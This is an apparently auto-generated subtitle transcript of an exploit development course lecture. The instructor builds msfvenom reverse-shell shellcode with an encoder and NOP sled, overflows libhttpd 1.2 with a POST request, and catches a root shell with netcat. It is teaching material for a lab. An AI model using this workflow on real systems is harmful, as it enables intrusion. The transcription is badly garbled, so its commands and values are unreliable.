1
00:00:00,270 --> 00:00:02,670
Okay, everybody, welcome back to Exploit Development.

2
00:00:02,670 --> 00:00:08,130
We're about to start our most exciting part of live damon the exploitation process.

3
00:00:08,670 --> 00:00:12,030
And I already tested a show called before, so it works.

4
00:00:12,450 --> 00:00:17,760
But let's just review the MSF beat on Paleo Generation script.

5
00:00:18,480 --> 00:00:28,110
So we're going to run MSF that I'm dash P controversial connect back to local health port 444 format

6
00:00:28,110 --> 00:00:39,210
python eliminate the bad character 09080d 22 and three F and then platform Linux architecture x86 encoder.

7
00:00:39,720 --> 00:00:47,380
Now let me talk to you about encoders because encoders are basically a very important part of our show

8
00:00:47,400 --> 00:00:47,760
code.

9
00:00:47,970 --> 00:00:53,580
Now, you would be under the assumption that the can be obvious and generated.

10
00:00:53,970 --> 00:00:59,280
You'll be on the assumption that MSF venom generates raw assembly show code.

11
00:00:59,610 --> 00:01:01,130
That's further than the truth.

12
00:01:01,150 --> 00:01:11,550
You think you c you need to protect your encoder because within the first 16 bytes of the shell code

13
00:01:12,150 --> 00:01:19,020
it actually encodes your assembly codes and operands to force move mover execution to get back to get

14
00:01:19,020 --> 00:01:21,330
passed with no mitigation measures.

15
00:01:21,750 --> 00:01:28,680
So in order to prevent this from being overwritten, we need to add a knop sled, which is a knopfler's

16
00:01:28,680 --> 00:01:30,780
is basically zero by nine zero.

17
00:01:30,780 --> 00:01:35,730
It does nothing except serve as a shield for the rest of the shell code.

18
00:01:36,030 --> 00:01:39,930
If you overwrite, let's see zero by B right here.

19
00:01:40,230 --> 00:01:41,280
The show code breaks.

20
00:01:43,430 --> 00:01:48,800
So you need to add a protective not sled so narrow first try.

21
00:01:51,150 --> 00:01:52,110
Let's copy this.

22
00:01:56,160 --> 00:02:03,720
And then notice here that we have 16 knobs non operation, no operation to protect the shell code.

23
00:02:04,020 --> 00:02:09,930
Now we don't have to worry about the seals anymore because as we previously discovered, the buffer

24
00:02:09,960 --> 00:02:18,810
is so large and this program so easily exploitable that we have a mass of length, just a stick in our

25
00:02:18,810 --> 00:02:19,410
shell code.

26
00:02:20,520 --> 00:02:22,740
So we don't have much of an issue here.

27
00:02:22,770 --> 00:02:24,970
But once we go into a hundred years, we will tell.

28
00:02:25,080 --> 00:02:29,370
We'll talk about limited buffer space, but that's a different section of the class.

29
00:02:29,820 --> 00:02:36,210
So what I want you to do is run that command, which was

30
00:02:42,150 --> 00:02:46,650
a massive venom dash p linux x86 shell versus TCP.

31
00:02:46,950 --> 00:02:48,270
O health equals local health.

32
00:02:48,420 --> 00:02:52,410
L port is 4444 format is python by bytes.

33
00:02:52,410 --> 00:03:00,120
Remember there are six of them 090a0d, 22 F and three F platform is Linux.

34
00:03:01,080 --> 00:03:09,000
Architecture is x86 and the encoder is Shikata Adonai, which I believe means all is lost because at

35
00:03:09,000 --> 00:03:13,620
the time that this encoder came out, there was actually no mitigations against it.

36
00:03:13,950 --> 00:03:16,290
And then we gave it the variable name show code.

37
00:03:20,290 --> 00:03:21,070
So let's see.

38
00:03:21,070 --> 00:03:22,180
The earth is correct.

39
00:03:22,840 --> 00:03:24,200
So we overflow.

40
00:03:24,310 --> 00:03:35,080
We overflowed our application with a post request of 1048 of a job instruction construction with a protective

41
00:03:35,080 --> 00:03:40,090
buffer of 16 knobs to protect our shell code, which is 95 baseline.

42
00:03:45,440 --> 00:03:53,120
So clear the new debugger and run esp 8080.

43
00:03:54,410 --> 00:03:57,810
Split your screen in that cat.

44
00:03:58,460 --> 00:04:02,150
This is to catch a shell and that cat and be all people for four.

45
00:04:03,830 --> 00:04:05,000
Split the screen again.

46
00:04:06,450 --> 00:04:07,200
Python.

47
00:04:07,530 --> 00:04:09,060
First try the pi.

48
00:04:10,740 --> 00:04:14,370
Control through the exit out of it, and we get a Kinect in a shell.

49
00:04:15,060 --> 00:04:19,050
So this doesn't look like a shell by normal circumstances.

50
00:04:19,050 --> 00:04:22,710
But to verify that it's a shell type, who who am I?

51
00:04:24,790 --> 00:04:27,070
Heidi, you named.

52
00:04:28,330 --> 00:04:29,320
Congratulations.

53
00:04:29,320 --> 00:04:34,120
You have just passed the first section of the course which is live HDP day and 1.2.

54
00:04:34,690 --> 00:04:42,940
And you have just gained a route level shell within a 32 bit image of Carole Lennox using live HP Diamond

55
00:04:42,940 --> 00:04:43,630
1.2.

56
00:04:44,110 --> 00:04:49,840
Thank you for your time and get ready for the next section, which is all male 5.5 that is a Windows

57
00:04:49,840 --> 00:04:54,790
exploit, so you will need a Windows XP vista or seven with so email install.

58
00:04:55,090 --> 00:04:58,090
Please refer to the installation videos.

59
00:04:58,840 --> 00:04:59,740
Thank you for your time.